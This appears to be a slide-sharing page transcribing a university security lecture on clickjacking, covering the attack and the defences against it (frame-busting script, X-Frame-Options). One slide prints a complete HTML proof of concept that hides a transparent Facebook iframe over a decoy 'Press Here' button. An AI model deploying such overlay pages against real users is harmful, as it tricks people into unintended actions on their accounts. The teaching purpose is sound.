Uploads Contact
/
Login Upload
Clickjacking Clickjacking

Clickjacking - PowerPoint Presentation

faustina-dinatale
faustina-dinatale . @faustina-dinatale
Follow
367 views
Uploaded On 2016-06-30
About Share Download

Clickjacking - PPT Presentation

CSE 591 Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University httpadamdoupecom Would you click this button ClickJacking In a clickjacking attack a user is lured into clicking a button that is not associated with the page displayed by the browser ID: 383508

100 clickjacking button style clickjacking 100 style button page index top div body opacity frame http press height width

Share:

Link:

Embed:

Download Presentation from below link

Download Presentation The PPT/PDF document "Clickjacking" is the property of its rightful owner. Permission is granted to download and print the materials on this web site for personal, non-commercial use only, and to display it on your personal computer provided you do not modify the materials and that you retain all copyright notices contained in the materials. By downloading content from our website, you accept the terms of this agreement.

Presentation Transcript

Slide1

Clickjacking

CSE 591 – Security and Vulnerability Analysis

Spring 2015

Adam Doupé

Arizona State University

http://adamdoupe.comSlide2

Would you click this button?Slide3

ClickJacking

In a

clickjacking

attack a user is lured into clicking a button that is not associated with the page displayed by the browser

Example: clicking on harmless

"Download free screensaver" button a on page on site A will actually become a click on "Like Button" on FacebookThe attack, also called "UI redressing," is performed by using overlapping transparent framesStacking order: z-index: <value> Transparency in Firefox: opacity: <value> Transparency in IE filter:alpha(opacity=<value>)

3Slide4

ClickJacking Example

<html>

<head>

<title>

Clickjacking

Times</title> </head> <body> <h1>Clickjacking Example</h1> <div style="z-index:2;

position:absolute

; top:0; left:0; width: 100%; height: 100%">

<iframe src="http://www.facebook.com/home.php?" id="frame1" style="opacity:0; filter:alpha(opacity=0);" width="100%" height="100%" /> </iframe> </div> <div align="right" style="position:absolute; top:0; left:0; z-index:1; width: 100%; height:100%; background-color: white; text-align:left;"> <p><input type="submit" value="Press Here" /><br />Press this button for an iPhone</p> </div> </body></html>

4Slide5

ClickJacking Example

5

Press Here!

Z-level: 2

Transparent

Z-level: 1

OpaqueSlide6

Frame Busting Code

<style> body {

display:none

;} </style>

<script>

if (self == top) { document.getElementsByTagName("body")[0].style.display = 'block'

;

}

else { top.location = self.location; } </script>From: Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites, July 20106Slide7

HTTP Headers

X-Frame-

Options HTTP response header

DENY

This page cannot be framed

SAMEORIGINOnly pages from the same origin may frame this pageALLOW-FROM <URI>Only allow this specific URI to fame this pagehttps://www.owasp.org/index.php/Clickjacking_Defense_Cheat_SheetSlide8

Summary

Need to be wary of how attacker can trick a user to accidentally take action on your web application

Clickjacking

is related to CSRF: both attacks allow an attacker to perform actions on your behalf

Related Contents


Clickjacking
Clickjacking PowerPoint Presentation
358 views
Clickjacking Attacks and Defenses
Clickjacking Attacks and Defenses PowerPoint Presentation
362 views
Next Show more